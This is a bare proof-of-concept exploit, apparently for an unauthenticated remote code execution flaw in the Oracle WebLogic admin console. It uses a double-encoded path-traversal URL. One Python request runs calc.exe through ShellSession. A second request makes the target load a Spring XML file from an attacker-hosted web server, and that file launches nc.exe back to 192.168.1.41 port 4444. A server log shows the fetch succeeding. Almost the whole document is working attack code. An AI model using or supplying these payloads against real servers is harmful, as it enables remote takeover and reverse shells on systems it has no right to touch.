import requests
url = 'http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession' \
'(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)'.format('192.168.1.53', '7001')
response = requests.get(url)Start web server with the following poc.xml:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>cmd</value>
<value>/c</value>
<value>C:\temp\nc.exe 192.168.1.41 4444</value>
</list>
</constructor-arg>
</bean>
</beans>$ python3 -m http.server
import requests
url = 'http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.1.41:8000/poc.xml%22)'.format('192.168.1.53', '7001')
response = requests.get(url)python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.53 - - [30/Oct/2020 07:00:12] "GET /poc.xml HTTP/1.1" 200 -